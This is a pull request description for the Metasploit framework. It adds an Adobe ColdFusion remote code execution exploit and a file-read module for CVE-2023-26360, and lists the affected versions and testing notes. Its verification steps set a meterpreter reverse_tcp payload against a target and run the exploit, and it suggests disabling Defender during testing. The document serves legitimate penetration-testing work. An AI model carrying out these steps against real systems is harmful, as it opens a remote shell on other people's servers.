rapid7/metasploit-framework
# RCE exploit for CVE-2023-26360 (Adobe ColdFusion) and an auxiliary module for arbitrary file read via the same vuln.

This pull request adds 2 modules; an RCE exploit for ~CVE-2023-26359~ CVE-2023-26360 (Adobe ColdFusion) and an auxiliary gather module for the same vuln that can be leveraged to read arbitrary files.

 ~CVE-2023-26359~ CVE-2023-26360 affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier. For a full technical analysis of the vulnerability read the [Rapid7 AttackerKB Analysis](https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis).

For testing steps, refer to the documentation file for each module added in this pull request.

The RCE exploit has targets for both Windows and Linux platforms, with both command payloads and native code droppers (via command stager) payloads for each platform.

**Note:** The `check` routine cannot identify the target ColdFusion version number as there is no way to retrieve this info (AFAIK). Therefore the `check`  will only identify if the target is ColdFusion and return `CheckCode::Detected` or else it will return `CheckCode::Unknown`.

**Note:** When testing on Windows, Defender will likely detect the default Windows payloads, so disable Defender during testing if required.

## Verification Steps (Linux Target)
1. Start msfconsole
2. `use exploit/multi/http/adobe_coldfusion_rce_cve_2023_26360`
3. `set LHOST eth0`
4. `set RHOST <TARGET_IP>`
5. `set target 4`
6. `set PAYLOAD linux/x64/meterpreter/reverse_tcp`
7. `check`
8. `exploit`

_Note: The above description edited April 17, 2023 - swapped references for CVE-2023-26359 to CVE-2023-26360 as we reassigned the CVE for this vuln last Friday._
